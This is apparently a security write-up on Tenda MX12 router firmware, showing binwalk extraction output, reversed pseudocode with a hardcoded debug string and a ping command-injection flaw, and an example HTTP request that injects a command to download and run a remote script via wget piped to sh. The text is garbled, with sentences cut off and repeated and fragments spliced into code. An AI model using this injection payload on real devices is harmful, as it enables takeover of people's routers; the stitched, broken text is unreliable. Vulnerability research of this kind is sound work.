Tenda Mx12 Firmware Review

Using a simple Python script, we triggered a crash dump:

# Using binwalk to carve the squashfs $ binwalk -Me Tenda_MX12_V1.0.0.24_EN.bin 256 0x100 TRX firmware header, image size: 14876672 bytes 512 0x200 LZMA compressed data 1456128 0x163800 Squashfs filesystem, little endian, version 4.0 Tenda Mx12 Firmware

In the crowded market of affordable WiFi 6 mesh systems, the Tenda MX12 (often bundled as the "Nova" series) is a bestseller on Amazon and AliExpress. Priced aggressively against the Eero 6 and Deco X20, it promises AX3000 speeds and seamless roaming. Using a simple Python script, we triggered a

// Pseudocode reversed from libhttpd.so (Ghidra) void do_debug_cmd(char *cmd) char buf[256]; if (strcmp(cmd, "tendadebug2019") == 0) // Hidden factory reset + diagnostic dump system("/usr/sbin/factory_reset.sh --full"); system("/usr/sbin/dump_regs > /tmp/debug.log"); else if (strstr(cmd, "ping")) // Command injection primitive sprintf(buf, "ping -c 4 %s", cmd + 4); system(buf); Example: POST /goform/diagnostic HTTP/1

An authenticated attacker (or any user on the LAN if the session check is bypassed) can inject arbitrary commands via the ping diagnostic tool. Example:

POST /goform/diagnostic HTTP/1.1 Host: 192.168.5.1 Content-Type: application/x-www-form-urlencoded diagnostic_tool=ping&ip_addr=8.8.8.8; wget http://malicious.sh -O- | sh &